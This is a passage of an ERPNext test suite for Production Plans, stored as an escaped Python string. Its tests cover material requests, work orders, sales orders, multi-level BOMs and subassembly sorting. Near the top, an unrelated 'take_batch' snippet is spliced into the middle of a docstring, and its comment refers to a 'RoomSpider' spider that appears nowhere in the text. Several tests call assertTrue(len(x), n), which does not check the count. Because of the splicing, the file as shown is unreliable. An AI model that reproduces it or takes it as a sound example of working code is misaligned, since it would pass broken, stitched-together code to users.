sr)\n\t\t\t\tsr_doc.cancel()\n\n\t\tcreate_item(\"Test Non Stock Raw Material\", is_stock_item=0)\n\t\tfor item, raw_materials in {\n\t\t\t\"Subassembly Item 1\": [\"Raw Material Item 1\", \"Raw Material Item 2\"],\n\t\t\t\"Test Production Item 1\": [\n\t\t\t\t\"Raw Material Item 1\",\n\t\t\t\t\"Subassembly Item 1\",\n\t\t\t\t\"Test Non Stock Raw Material\",\n\t\t\t],\n\t\t}.items():\n\t\t\tif not frappe.db.get_value(\"BOM\", {\"item\": item}):\n\t\t\t\tmake_bom(item=item, raw_materials=raw_materials)\n\n\tdef tearDown(self) -> None:\n\t\tfrappe.db.rollback()\n\n\tdef test_production_plan_mr_creation(self):\n\t\t\"Test if MRs are created for unavailable raw 
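# --- Hedged reduction of RoomSpider.post_data's draining loop above: pop up
# to n ids per request so each POST stays under the concurrency cap.
def take_batch(items, n):
    batch = []
    while n > 0 and items:
        batch.append(items.pop())
        n -= 1
    return batch

rooms = ['r1', 'r2', 'r3', 'r4', 'r5']
assert take_batch(rooms, 3) == ['r5', 'r4', 'r3']
assert rooms == ['r1', 'r2']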
materials.\"\n\t\tpln = create_production_plan(item_code=\"Test Production Item 1\")\n\t\tself.assertTrue(len(pln.mr_items), 2)\n\n\t\tpln.make_material_request()\n\t\tpln.reload()\n\t\tself.assertTrue(pln.status, \"Material Requested\")\n\n\t\tmaterial_requests = frappe.get_all(\n\t\t\t\"Material Request Item\",\n\t\t\tfields=[\"distinct parent\"],\n\t\t\tfilters={\"production_plan\": pln.name},\n\t\t\tas_list=1,\n\t\t)\n\n\t\tself.assertTrue(len(material_requests), 2)\n\n\t\tpln.make_work_order()\n\t\twork_orders = frappe.get_all(\n\t\t\t\"Work Order\", fields=[\"name\"], filters={\"production_plan\": pln.name}, as_list=1\n\t\t)\n\n\t\tself.assertTrue(len(work_orders), len(pln.po_items))\n\n\t\tfor name in material_requests:\n\t\t\tmr = frappe.get_doc(\"Material Request\", name[0])\n\t\t\tif mr.docstatus != 0:\n\t\t\t\tmr.cancel()\n\n\t\tfor name in work_orders:\n\t\t\tmr = frappe.delete_doc(\"Work Order\", name[0])\n\n\t\tpln = frappe.get_doc(\"Production Plan\", pln.name)\n\t\tpln.cancel()\n\n\tdef test_production_plan_start_date(self):\n\t\t\"Test if Work Order has same Planned Start Date as Prod Plan.\"\n\t\tplanned_date = add_to_date(date=None, days=3)\n\t\tplan = create_production_plan(\n\t\t\titem_code=\"Test Production Item 1\", planned_start_date=planned_date\n\t\t)\n\t\tplan.make_work_order()\n\n\t\twork_orders = frappe.get_all(\n\t\t\t\"Work Order\", fields=[\"name\", \"planned_start_date\"], filters={\"production_plan\": plan.name}\n\t\t)\n\n\t\tself.assertEqual(work_orders[0].planned_start_date, planned_date)\n\n\t\tfor wo in work_orders:\n\t\t\tfrappe.delete_doc(\"Work Order\", wo.name)\n\n\t\tplan.reload()\n\t\tplan.cancel()\n\n\tdef test_production_plan_for_existing_ordered_qty(self):\n\t\t\"\"\"\n\t\t- Enable 'ignore_existing_ordered_qty'.\n\t\t- Test if MR Planning table pulls Raw Material Qty even if it is in stock.\n\t\t\"\"\"\n\t\tsr1 = create_stock_reconciliation(\n\t\t\titem_code=\"Raw Material Item 1\", target=\"_Test Warehouse - _TC\", qty=1, rate=110\n\t\t)\n\t\tsr2 = create_stock_reconciliation(\n\t\t\titem_code=\"Raw Material Item 2\", target=\"_Test Warehouse - _TC\", qty=1, rate=120\n\t\t)\n\n\t\tpln = create_production_plan(item_code=\"Test Production Item 1\", ignore_existing_ordered_qty=1)\n\t\tself.assertTrue(len(pln.mr_items))\n\t\tself.assertTrue(flt(pln.mr_items[0].quantity), 1.0)\n\n\t\tsr1.cancel()\n\t\tsr2.cancel()\n\t\tpln.cancel()\n\n\tdef test_production_plan_with_non_stock_item(self):\n\t\t\"Test if MR Planning table includes Non Stock RM.\"\n\t\tpln = create_production_plan(item_code=\"Test Production Item 1\", include_non_stock_items=1)\n\t\tself.assertTrue(len(pln.mr_items), 3)\n\t\tpln.cancel()\n\n\tdef test_production_plan_without_multi_level(self):\n\t\t\"Test MR Planning table for non exploded BOM.\"\n\t\tpln = create_production_plan(item_code=\"Test Production Item 1\", use_multi_level_bom=0)\n\t\tself.assertTrue(len(pln.mr_items), 2)\n\t\tpln.cancel()\n\n\tdef test_production_plan_without_multi_level_for_existing_ordered_qty(self):\n\t\t\"\"\"\n\t\t- Disable 'ignore_existing_ordered_qty'.\n\t\t- Test if MR Planning table avoids pulling Raw Material Qty as it is in stock for\n\t\tnon exploded BOM.\n\t\t\"\"\"\n\t\tsr1 = create_stock_reconciliation(\n\t\t\titem_code=\"Raw Material Item 1\", target=\"_Test Warehouse - _TC\", qty=1, rate=130\n\t\t)\n\t\tsr2 = create_stock_reconciliation(\n\t\t\titem_code=\"Subassembly Item 1\", target=\"_Test Warehouse - _TC\", qty=1, rate=140\n\t\t)\n\n\t\tpln = 
create_production_plan(\n\t\t\titem_code=\"Test Production Item 1\", use_multi_level_bom=0, ignore_existing_ordered_qty=0\n\t\t)\n\t\tself.assertFalse(len(pln.mr_items))\n\n\t\tsr1.cancel()\n\t\tsr2.cancel()\n\t\tpln.cancel()\n\n\tdef test_production_plan_sales_orders(self):\n\t\t\"Test if previously fulfilled SO (with WO) is pulled into Prod Plan.\"\n\t\titem = \"Test Production Item 1\"\n\t\tso = make_sales_order(item_code=item, qty=1)\n\t\tsales_order = so.name\n\t\tsales_order_item = so.items[0].name\n\n\t\tpln = frappe.new_doc(\"Production Plan\")\n\t\tpln.company = so.company\n\t\tpln.get_items_from = \"Sales Order\"\n\n\t\tpln.append(\n\t\t\t\"sales_orders\",\n\t\t\t{\n\t\t\t\t\"sales_order\": so.name,\n\t\t\t\t\"sales_order_date\": so.transaction_date,\n\t\t\t\t\"customer\": so.customer,\n\t\t\t\t\"grand_total\": so.grand_total,\n\t\t\t},\n\t\t)\n\n\t\tpln.get_so_items()\n\t\tpln.submit()\n\t\tpln.make_work_order()\n\n\t\twork_order = frappe.db.get_value(\n\t\t\t\"Work Order\",\n\t\t\t{\"sales_order\": sales_order, \"production_plan\": pln.name, \"sales_order_item\": sales_order_item},\n\t\t\t\"name\",\n\t\t)\n\n\t\two_doc = frappe.get_doc(\"Work Order\", work_order)\n\t\two_doc.update(\n\t\t\t{\"wip_warehouse\": \"Work In Progress - _TC\", \"fg_warehouse\": \"Finished Goods - _TC\"}\n\t\t)\n\t\two_doc.submit()\n\n\t\tso_wo_qty = frappe.db.get_value(\"Sales Order Item\", sales_order_item, \"work_order_qty\")\n\t\tself.assertTrue(so_wo_qty, 5)\n\n\t\tpln = frappe.new_doc(\"Production Plan\")\n\t\tpln.update(\n\t\t\t{\n\t\t\t\t\"from_date\": so.transaction_date,\n\t\t\t\t\"to_date\": so.transaction_date,\n\t\t\t\t\"customer\": so.customer,\n\t\t\t\t\"item_code\": item,\n\t\t\t\t\"sales_order_status\": so.status,\n\t\t\t}\n\t\t)\n\t\tsales_orders = get_sales_orders(pln) or {}\n\t\tsales_orders = [d.get(\"name\") for d in sales_orders if d.get(\"name\") == sales_order]\n\n\t\tself.assertEqual(sales_orders, [])\n\n\tdef test_production_plan_combine_items(self):\n\t\t\"Test combining FG items in Production Plan.\"\n\t\titem = \"Test Production Item 1\"\n\t\tso1 = make_sales_order(item_code=item, qty=1)\n\n\t\tpln = frappe.new_doc(\"Production Plan\")\n\t\tpln.company = so1.company\n\t\tpln.get_items_from = \"Sales Order\"\n\t\tpln.append(\n\t\t\t\"sales_orders\",\n\t\t\t{\n\t\t\t\t\"sales_order\": so1.name,\n\t\t\t\t\"sales_order_date\": so1.transaction_date,\n\t\t\t\t\"customer\": so1.customer,\n\t\t\t\t\"grand_total\": so1.grand_total,\n\t\t\t},\n\t\t)\n\t\tso2 = make_sales_order(item_code=item, qty=2)\n\t\tpln.append(\n\t\t\t\"sales_orders\",\n\t\t\t{\n\t\t\t\t\"sales_order\": so2.name,\n\t\t\t\t\"sales_order_date\": so2.transaction_date,\n\t\t\t\t\"customer\": so2.customer,\n\t\t\t\t\"grand_total\": so2.grand_total,\n\t\t\t},\n\t\t)\n\t\tpln.combine_items = 1\n\t\tpln.get_items()\n\t\tpln.submit()\n\n\t\tself.assertTrue(pln.po_items[0].planned_qty, 3)\n\n\t\tpln.make_work_order()\n\t\twork_order = frappe.db.get_value(\n\t\t\t\"Work Order\",\n\t\t\t{\"production_plan_item\": pln.po_items[0].name, \"production_plan\": pln.name},\n\t\t\t\"name\",\n\t\t)\n\n\t\two_doc = frappe.get_doc(\"Work Order\", work_order)\n\t\two_doc.update(\n\t\t\t{\n\t\t\t\t\"wip_warehouse\": \"Work In Progress - _TC\",\n\t\t\t}\n\t\t)\n\n\t\two_doc.submit()\n\t\tso_items = []\n\t\tfor plan_reference in pln.prod_plan_references:\n\t\t\tso_items.append(plan_reference.sales_order_item)\n\t\t\tso_wo_qty = frappe.db.get_value(\n\t\t\t\t\"Sales Order Item\", plan_reference.sales_order_item, 
\"work_order_qty\"\n\t\t\t)\n\t\t\tself.assertEqual(so_wo_qty, plan_reference.qty)\n\n\t\two_doc.cancel()\n\t\tfor so_item in so_items:\n\t\t\tso_wo_qty = frappe.db.get_value(\"Sales Order Item\", so_item, \"work_order_qty\")\n\t\t\tself.assertEqual(so_wo_qty, 0.0)\n\n\t\tpln.reload()\n\t\tpln.cancel()\n\n\tdef test_production_plan_combine_subassembly(self):\n\t\t\"\"\"\n\t\tTest combining Sub assembly items belonging to the same BOM in Prod Plan.\n\t\t1) Red-Car -> Wheel (sub assembly) > BOM-WHEEL-001\n\t\t2) Green-Car -> Wheel (sub assembly) > BOM-WHEEL-001\n\t\t\"\"\"\n\t\tfrom erpnext.manufacturing.doctype.bom.test_bom import create_nested_bom\n\n\t\tbom_tree_1 = {\"Red-Car\": {\"Wheel\": {\"Rubber\": {}}}}\n\t\tbom_tree_2 = {\"Green-Car\": {\"Wheel\": {\"Rubber\": {}}}}\n\n\t\tparent_bom_1 = create_nested_bom(bom_tree_1, prefix=\"\")\n\t\tparent_bom_2 = create_nested_bom(bom_tree_2, prefix=\"\")\n\n\t\t# make sure both boms use same subassembly bom\n\t\tsubassembly_bom = parent_bom_1.items[0].bom_no\n\t\tfrappe.db.set_value(\"BOM Item\", parent_bom_2.items[0].name, \"bom_no\", subassembly_bom)\n\n\t\tplan = create_production_plan(item_code=\"Red-Car\", use_multi_level_bom=1, do_not_save=True)\n\t\tplan.append(\n\t\t\t\"po_items\",\n\t\t\t{ # Add Green-Car to Prod Plan\n\t\t\t\t\"use_multi_level_bom\": 1,\n\t\t\t\t\"item_code\": \"Green-Car\",\n\t\t\t\t\"bom_no\": frappe.db.get_value(\"Item\", \"Green-Car\", \"default_bom\"),\n\t\t\t\t\"planned_qty\": 1,\n\t\t\t\t\"planned_start_date\": now_datetime(),\n\t\t\t},\n\t\t)\n\t\tplan.get_sub_assembly_items()\n\t\tself.assertTrue(len(plan.sub_assembly_items), 2)\n\n\t\tplan.combine_sub_items = 1\n\t\tplan.get_sub_assembly_items()\n\n\t\tself.assertTrue(len(plan.sub_assembly_items), 1) # check if sub-assembly items merged\n\t\tself.assertEqual(plan.sub_assembly_items[0].qty, 2.0)\n\t\tself.assertEqual(plan.sub_assembly_items[0].stock_qty, 2.0)\n\n\t\t# change warehouse in one row, sub-assemblies should not merge\n\t\tplan.po_items[0].warehouse = \"Finished Goods - _TC\"\n\t\tplan.get_sub_assembly_items()\n\t\tself.assertTrue(len(plan.sub_assembly_items), 2)\n\n\tdef test_pp_to_mr_customer_provided(self):\n\t\t\"Test Material Request from Production Plan for Customer Provided Item.\"\n\t\tcreate_item(\n\t\t\t\"CUST-0987\", is_customer_provided_item=1, customer=\"_Test Customer\", is_purchase_item=0\n\t\t)\n\t\tcreate_item(\"Production Item CUST\")\n\n\t\tfor item, raw_materials in {\n\t\t\t\"Production Item CUST\": [\"Raw Material Item 1\", \"CUST-0987\"]\n\t\t}.items():\n\t\t\tif not frappe.db.get_value(\"BOM\", {\"item\": item}):\n\t\t\t\tmake_bom(item=item, raw_materials=raw_materials)\n\t\tproduction_plan = create_production_plan(item_code=\"Production Item CUST\")\n\t\tproduction_plan.make_material_request()\n\n\t\tmaterial_request = frappe.db.get_value(\n\t\t\t\"Material Request Item\",\n\t\t\t{\"production_plan\": production_plan.name, \"item_code\": \"CUST-0987\"},\n\t\t\t\"parent\",\n\t\t)\n\t\tmr = frappe.get_doc(\"Material Request\", material_request)\n\n\t\tself.assertTrue(mr.material_request_type, \"Customer Provided\")\n\t\tself.assertTrue(mr.customer, \"_Test Customer\")\n\n\tdef test_production_plan_with_multi_level_bom(self):\n\t\t\"\"\"\n\t\tItem Code\t|\tQty\t|\n\t\t|Test BOM 1\t|\t1\t|\n\t\t|Test BOM 2\t|\t2\t|\n\t\t|Test BOM 3\t|\t3\t|\n\t\t\"\"\"\n\n\t\tfor item_code in [\"Test BOM 1\", \"Test BOM 2\", \"Test BOM 3\", \"Test RM BOM 1\"]:\n\t\t\tcreate_item(item_code, is_stock_item=1)\n\n\t\t# created bom upto 3 
level\n\t\tif not frappe.db.get_value(\"BOM\", {\"item\": \"Test BOM 3\"}):\n\t\t\tmake_bom(item=\"Test BOM 3\", raw_materials=[\"Test RM BOM 1\"], rm_qty=3)\n\n\t\tif not frappe.db.get_value(\"BOM\", {\"item\": \"Test BOM 2\"}):\n\t\t\tmake_bom(item=\"Test BOM 2\", raw_materials=[\"Test BOM 3\"], rm_qty=3)\n\n\t\tif not frappe.db.get_value(\"BOM\", {\"item\": \"Test BOM 1\"}):\n\t\t\tmake_bom(item=\"Test BOM 1\", raw_materials=[\"Test BOM 2\"], rm_qty=2)\n\n\t\titem_code = \"Test BOM 1\"\n\t\tpln = frappe.new_doc(\"Production Plan\")\n\t\tpln.company = \"_Test Company\"\n\t\tpln.append(\n\t\t\t\"po_items\",\n\t\t\t{\n\t\t\t\t\"item_code\": item_code,\n\t\t\t\t\"bom_no\": frappe.db.get_value(\"BOM\", {\"item\": \"Test BOM 1\"}),\n\t\t\t\t\"planned_qty\": 3,\n\t\t\t},\n\t\t)\n\n\t\tpln.get_sub_assembly_items(\"In House\")\n\t\tpln.submit()\n\t\tpln.make_work_order()\n\n\t\t# last level sub-assembly work order produce qty\n\t\tto_produce_qty = frappe.db.get_value(\n\t\t\t\"Work Order\", {\"production_plan\": pln.name, \"production_item\": \"Test BOM 3\"}, \"qty\"\n\t\t)\n\n\t\tself.assertEqual(to_produce_qty, 18.0)\n\t\tpln.cancel()\n\t\tfrappe.delete_doc(\"Production Plan\", pln.name)\n\n\tdef test_get_warehouse_list_group(self):\n\t\t\"Check if required child warehouses are returned.\"\n\t\twarehouse_json = '[{\"warehouse\":\"_Test Warehouse Group - _TC\"}]'\n\n\t\twarehouses = set(get_warehouse_list(warehouse_json))\n\t\texpected_warehouses = {\"_Test Warehouse Group-C1 - _TC\", \"_Test Warehouse Group-C2 - _TC\"}\n\n\t\tmissing_warehouse = expected_warehouses - warehouses\n\n\t\tself.assertTrue(\n\t\t\tlen(missing_warehouse) == 0,\n\t\t\tmsg=f\"Following warehouses were expected {', '.join(missing_warehouse)}\",\n\t\t)\n\n\tdef test_get_warehouse_list_single(self):\n\t\t\"Check if same warehouse is returned in absence of child warehouses.\"\n\t\twarehouse_json = '[{\"warehouse\":\"_Test Scrap Warehouse - _TC\"}]'\n\n\t\twarehouses = set(get_warehouse_list(warehouse_json))\n\t\texpected_warehouses = {\n\t\t\t\"_Test Scrap Warehouse - _TC\",\n\t\t}\n\n\t\tself.assertEqual(warehouses, expected_warehouses)\n\n\tdef test_get_sales_order_with_variant(self):\n\t\t\"Check if Template BOM is fetched in absence of Variant BOM.\"\n\t\trm_item = create_item(\"PIV_RM\", valuation_rate=100)\n\t\tif not frappe.db.exists(\"Item\", {\"item_code\": \"PIV\"}):\n\t\t\titem = create_item(\"PIV\", valuation_rate=100)\n\t\t\tvariant_settings = {\n\t\t\t\t\"attributes\": [\n\t\t\t\t\t{\"attribute\": \"Colour\"},\n\t\t\t\t],\n\t\t\t\t\"has_variants\": 1,\n\t\t\t}\n\t\t\titem.update(variant_settings)\n\t\t\titem.save()\n\t\t\tparent_bom = make_bom(item=\"PIV\", raw_materials=[rm_item.item_code])\n\t\tif not frappe.db.exists(\"BOM\", {\"item\": \"PIV\"}):\n\t\t\tparent_bom = make_bom(item=\"PIV\", raw_materials=[rm_item.item_code])\n\t\telse:\n\t\t\tparent_bom = frappe.get_doc(\"BOM\", {\"item\": \"PIV\"})\n\n\t\tif not frappe.db.exists(\"Item\", {\"item_code\": \"PIV-RED\"}):\n\t\t\tvariant = create_variant(\"PIV\", {\"Colour\": \"Red\"})\n\t\t\tvariant.save()\n\t\t\tvariant_bom = make_bom(item=variant.item_code, raw_materials=[rm_item.item_code])\n\t\telse:\n\t\t\tvariant = frappe.get_doc(\"Item\", \"PIV-RED\")\n\t\tif not frappe.db.exists(\"BOM\", {\"item\": \"PIV-RED\"}):\n\t\t\tvariant_bom = make_bom(item=variant.item_code, raw_materials=[rm_item.item_code])\n\n\t\t\"\"\"Testing when item variant has a BOM\"\"\"\n\t\tso = make_sales_order(item_code=\"PIV-RED\", qty=5)\n\t\tpln = frappe.new_doc(\"Production 
Plan\")\n\t\tpln.company = so.company\n\t\tpln.get_items_from = \"Sales Order\"\n\t\tpln.item_code = \"PIV-RED\"\n\t\tpln.get_open_sales_orders()\n\t\tself.assertEqual(pln.sales_orders[0].sales_order, so.name)\n\t\tpln.get_so_items()\n\t\tself.assertEqual(pln.po_items[0].item_code, \"PIV-RED\")\n\t\tself.assertEqual(pln.po_items[0].bom_no, variant_bom.name)\n\t\tso.cancel()\n\t\tfrappe.delete_doc(\"Sales Order\", so.name)\n\t\tvariant_bom.cancel()\n\t\tfrappe.delete_doc(\"BOM\", variant_bom.name)\n\n\t\t\"\"\"Testing when item variant doesn't have a BOM\"\"\"\n\t\tso = make_sales_order(item_code=\"PIV-RED\", qty=5)\n\t\tpln.get_open_sales_orders()\n\t\tself.assertEqual(pln.sales_orders[0].sales_order, so.name)\n\t\tpln.po_items = []\n\t\tpln.get_so_items()\n\t\tself.assertEqual(pln.po_items[0].item_code, \"PIV-RED\")\n\t\tself.assertEqual(pln.po_items[0].bom_no, parent_bom.name)\n\n\t\tfrappe.db.rollback()\n\n\tdef test_subassmebly_sorting(self):\n\t\t\"Test subassembly sorting in case of multiple items with nested BOMs.\"\n\t\tfrom erpnext.manufacturing.doctype.bom.test_bom import create_nested_bom\n\n\t\tprefix = \"_TestLevel_\"\n\t\tboms = {\n\t\t\t\"Assembly\": {\n\t\t\t\t\"SubAssembly1\": {\n\t\t\t\t\t\"ChildPart1\": {},\n\t\t\t\t\t\"ChildPart2\": {},\n\t\t\t\t},\n\t\t\t\t\"ChildPart6\": {},\n\t\t\t\t\"SubAssembly4\": {\"SubSubAssy2\": {\"ChildPart7\": {}}},\n\t\t\t},\n\t\t\t\"MegaDeepAssy\": {\n\t\t\t\t\"SecretSubassy\": {\n\t\t\t\t\t\"SecretPart\": {\"VerySecret\": {\"SuperSecret\": {\"Classified\": {}}}},\n\t\t\t\t},\n\t\t\t\t# ^ assert that this is\n\t\t\t\t# first item in subassy table\n\t\t\t},\n\t\t}\n\t\tcreate_nested_bom(boms, prefix=prefix)\n\n\t\titems = [prefix + item_code for item_code in boms.keys()]\n\t\tplan = create_production_plan(item_code=items[0], do_not_save=True)\n\t\tplan.append(\n\t\t\t\"po_items\",\n\t\t\t{\n\t\t\t\t\"use_multi_level_bom\": 1,\n\t\t\t\t\"item_code\": items[1],\n\t\t\t\t\"bom_no\": frappe.db.get_value(\"Item\", items[1], \"default_bom\"),\n\t\t\t\t\"planned_qty\": 1,\n\t\t\t\t\"planned_start_date\": now_datetime(),\n\t\t\t},\n\t\t)\n\t\tplan.get_sub_assembly_items()\n\n\t\tbom_level_order = [d.bom_level for d in plan.sub_assembly_items]\n\t\tself.assertEqual(bom_level_order, sorted(bom_level_order, reverse=True))\n\t\t# lowest most level of subassembly should be first\n\t\tself.assertIn(\"SuperSecret\", plan.sub_assembly_items[0].production_item)\n\n\tdef test_multiple_work_order_for_production_plan_item(self):\n\t\t\"Test producing Prod Plan (making WO) in parts.\"\n\n\t\tdef create_work_order(item, pln, qty):\n\t\t\t# Get Production Items\n\t\t\titems_data = pln.get_production_items()\n\n\t\t\t# Update qty\n\t\t\titems_data[(item, None, None)][\"qty\"] = qty\n\n\t\t\t# Create and Submit Work Order for each item in items_data\n\t\t\tfor key, item in items_data.items():\n\t\t\t\tif pln.sub_assembly_items:\n\t\t\t\t\titem[\"use_multi_level_bom\"] = 0\n\n\t\t\t\two_name = pln.create_work_order(item)\n\t\t\t\two_doc = frappe.get_doc(\"Work Order\", wo_name)\n\t\t\t\two_doc.update(\n\t\t\t\t\t{\"wip_warehouse\": \"Work In Progress - _TC\", \"fg_warehouse\": \"Finished Goods - _TC\"}\n\t\t\t\t)\n\t\t\t\two_doc.submit()\n\t\t\t\two_list.append(wo_name)\n\n\t\titem = \"Test Production Item 1\"\n\t\traw_materials = [\"Raw Material Item 1\", \"Raw Material Item 2\"]\n\n\t\t# Create BOM\n\t\tbom = make_bom(item=item, raw_materials=raw_materials)\n\n\t\t# Create Production Plan\n\t\tpln = create_production_plan(item_code=bom.item, planned_qty=5)\n\n\t\t# 
All the created Work Orders\n\t\two_list = []\n\n\t\t# Create and Submit 1st Work Order for 3 qty\n\t\tcreate_work_order(item, pln, 3)\n\t\tpln.reload()\n\t\tself.assertEqual(pln.po_items[0].ordered_qty, 3)\n\n\t\t# Create and Submit 2nd Work Order for 2 qty\n\t\tcreate_work_order(item, pln, 2)\n\t\tpln.reload()\n\t\tself.assertEqual(pln.po_items[0].ordered_qty, 5)\n\n\t\t# Overproduction\n\t\tself.assertRaises(OverProductionError, create_work_order, item=item, pln=pln, qty=2)\n\n\t\t# Cancel 1st Work Order\n\t\two1 = frappe.get_doc(\"Work Order\", wo_list[0])\n\t\two1.cancel()\n\t\tpln.reload()\n\t\tself.assertEqual(pln.po_items[0].ordered_qty, 2)\n\n\t\t# Cancel 2nd Work Order\n\t\two2 = frappe.get_doc(\"Work Order\", wo_list[1])\n\t\two2.cancel()\n\t\tpln.reload()\n\t\tself.assertEqual(pln.po_items[0].ordered_qty, 0)\n\n\tdef test_production_plan_pending_qty_with_sales_order(self):\n\t\t\"\"\"\n\t\tTest Prod Plan impact via: SO -> Prod Plan -> WO -> SE -> SE (cancel)\n\t\t\"\"\"\n\t\tfrom erpnext.manufacturing.doctype.work_order.test_work_order import make_wo_order_test_record\n\t\tfrom erpnext.manufacturing.doctype.work_order.work_order import (\n\t\t\tmake_stock_entry as make_se_from_wo,\n\t\t)\n\n\t\tmake_stock_entry(\n\t\t\titem_code=\"Raw Material Item 1\", target=\"Work In Progress - _TC\", qty=2, basic_rate=100\n\t\t)\n\t\tmake_stock_entry(\n\t\t\titem_code=\"Raw Material Item 2\", target=\"Work In Progress - _TC\", qty=2, basic_rate=100\n\t\t)\n\n\t\titem = \"Test Production Item 1\"\n\t\tso = make_sales_order(item_code=item, qty=1)\n\n\t\tpln = create_production_plan(\n\t\t\tcompany=so.company, get_items_from=\"Sales Order\", sales_order=so, skip_getting_mr_items=True\n\t\t)\n\t\tself.assertEqual(pln.po_items[0].pending_qty, 1)\n\n\t\two = make_wo_order_test_record(\n\t\t\titem_code=item,\n\t\t\tqty=1,\n\t\t\tcompany=so.company,\n\t\t\twip_warehouse=\"Work In Progress - _TC\",\n\t\t\tfg_warehouse=\"Finished Goods - _TC\",\n\t\t\tskip_transfer=1,\n\t\t\tuse_multi_level_bom=1,\n\t\t\tdo_not_submit=True,\n\t\t)\n\t\two.production_plan = pln.name\n\t\two.production_plan_item = pln.po_items[0].name\n\t\two.submit()\n\n\t\tse = frappe.get_doc(make_se_from_wo(wo.name, \"Manufacture\", 1))\n\t\tse.submit()\n\n\t\tpln.reload()\n\t\tself.assertEqual(pln.po_items[0].pending_qty, 0)\n\n\t\tse.cancel()\n\t\tpln.reload()\n\t\tself.assertEqual(pln.po_items[0].pending_qty, 1)\n\n\tdef test_production_plan_pending_qty_independent_items(self):\n\t\t\"Test Prod Plan impact if items are added independently (no from SO or MR).\"\n\t\tfrom erpnext.manufacturing.doctype.work_order.test_work_order import make_wo_order_test_record\n\t\tfrom erpnext.manufacturing.doctype.work_order.work_order import (\n\t\t\tmake_stock_entry as make_se_from_wo,\n\t\t)\n\n\t\tmake_stock_entry(\n\t\t\titem_code=\"Raw Material Item 1\", target=\"Work In Progress - _TC\", qty=2, basic_rate=100\n\t\t)\n\t\tmake_stock_entry(\n\t\t\titem_code=\"Raw Material Item 2\", target=\"Work In Progress - _TC\", qty=2, basic_rate=100\n\t\t)\n\n\t\tpln = create_production_plan(item_code=\"Test Production Item 1\", skip_getting_mr_items=True)\n\t\tself.assertEqual(pln.po_items[0].pending_qty, 1)\n\n\t\two = make_wo_order_test_record(\n\t\t\titem_code=\"Test Production Item 1\",\n\t\t\tqty=1,\n\t\t\tcompany=pln.company,\n\t\t\twip_warehouse=\"Work In Progress - _TC\",\n\t\t\tfg_warehouse=\"Finished Goods - _TC\",\n\t\t\tskip_transfer=1,\n\t\t\tuse_multi_level_bom=1,\n\t\t\tdo_not_submit=True,\n\t\t)\n\t\two.production_plan = 
pln.name\n\t\two.production_plan_item = pln.po_items[0].name\n\t\two.submit()\n\n\t\tse = frappe.get_doc(make_se_from_wo(wo.name, \"Manufacture\", 1))\n\t\tse.submit()\n\n\t\tpln.reload()\n\t\tself.assertEqual(pln.po_items[0].pending_qty, 0)\n\n\t\tse.cancel()\n\t\tpln.reload()\n\t\tself.assertEqual(pln.po_items[0].pending_qty, 1)\n\n\tdef test_qty_based_status(self):\n\t\tpp = frappe.new_doc(\"Production Plan\")\n\t\tpp.po_items = [frappe._dict(planned_qty=5, produce_qty=4)]\n\t\tself.assertFalse(pp.all_items_completed())\n\n\t\tpp.po_items = [\n\t\t\tfrappe._dict(planned_qty=5, produce_qty=10),\n\t\t\tfrappe._dict(planned_qty=5, produce_qty=4),\n\t\t]\n\t\tself.assertFalse(pp.all_items_completed())\n\n\tdef test_production_plan_planned_qty(self):\n\t\tpln = create_production_plan(item_code=\"_Test FG Item\", planned_qty=0.55)\n\t\tpln.make_work_order()\n\t\twork_order = frappe.db.get_value(\"Work Order\", {\"production_plan\": pln.name}, \"name\")\n\t\two_doc = frappe.get_doc(\"Work Order\", work_order)\n\t\two_doc.update(\n\t\t\t{\"wip_warehouse\": \"Work In Progress - _TC\", \"fg_warehouse\": \"Finished Goods - _TC\"}\n\t\t)\n\t\two_doc.submit()\n\t\tself.assertEqual(wo_doc.qty, 0.55)\n\n\tdef test_temporary_name_relinking(self):\n\n\t\tpp = frappe.new_doc(\"Production Plan\")\n\n\t\t# this can not be unittested so mocking data that would be expected\n\t\t# from client side.\n\t\tfor _ in range(10):\n\t\t\tpo_item = pp.append(\n\t\t\t\t\"po_items\",\n\t\t\t\t{\n\t\t\t\t\t\"name\": frappe.generate_hash(length=10),\n\t\t\t\t\t\"temporary_name\": frappe.generate_hash(length=10),\n\t\t\t\t},\n\t\t\t)\n\t\t\tpp.append(\"sub_assembly_items\", {\"production_plan_item\": po_item.temporary_name})\n\t\tpp._rename_temporary_references()\n\n\t\tfor po_item, subassy_item in zip(pp.po_items, pp.sub_assembly_items):\n\t\t\tself.assertEqual(po_item.name, subassy_item.production_plan_item)\n\n\t\t# bad links should be erased\n\t\tpp.append(\"sub_assembly_items\", {\"production_plan_item\": frappe.generate_hash(length=16)})\n\t\tpp._rename_temporary_references()\n\t\tself.assertIsNone(pp.sub_assembly_items[-1].production_plan_item)\n\t\tpp.sub_assembly_items.pop()\n\n\t\t# reattempting on same doc shouldn't change anything\n\t\tpp._rename_temporary_references()\n\t\tfor po_item, subassy_item in zip(pp.po_items, pp.sub_assembly_items):\n\t\t\tself.assertEqual(po_item.name, subassy_item.production_plan_item)\n\n\ndef create_production_plan(**args):\n\t\"\"\"\n\tsales_order (obj): Sales Order Doc Object\n\tget_items_from (str): Sales Order/Material Request\n\tskip_getting_mr_items (bool): Whether or not to plan for new MRs\n\t\"\"\"\n\targs = frappe._dict(args)\n\n\tpln = frappe.get_doc(\n\t\t{\n\t\t\t\"doctype\": \"Production Plan\",\n\t\t\t\"company\": args.company or \"_Test Company\",\n\t\t\t\"customer\": args.customer or \"_Test Customer\",\n\t\t\t\"posting_date\": nowdate(),\n\t\t\t\"include_non_stock_items\": args.include_non_stock_items or 0,\n\t\t\t\"include_subcontracted_items\": args.include_subcontracted_items or 0,\n\t\t\t\"ignore_existing_ordered_qty\": args.ignore_existing_ordered_qty or 0,\n\t\t\t\"get_items_from\": \"Sales Order\",\n\t\t}\n\t)\n\n\tif not args.get(\"sales_order\"):\n\t\tpln.append(\n\t\t\t\"po_items\",\n\t\t\t{\n\t\t\t\t\"use_multi_level_bom\": args.use_multi_level_bom or 1,\n\t\t\t\t\"item_code\": args.item_code,\n\t\t\t\t\"bom_no\": frappe.db.get_value(\"Item\", args.item_code, \"default_bom\"),\n\t\t\t\t\"planned_qty\": args.planned_qty or 
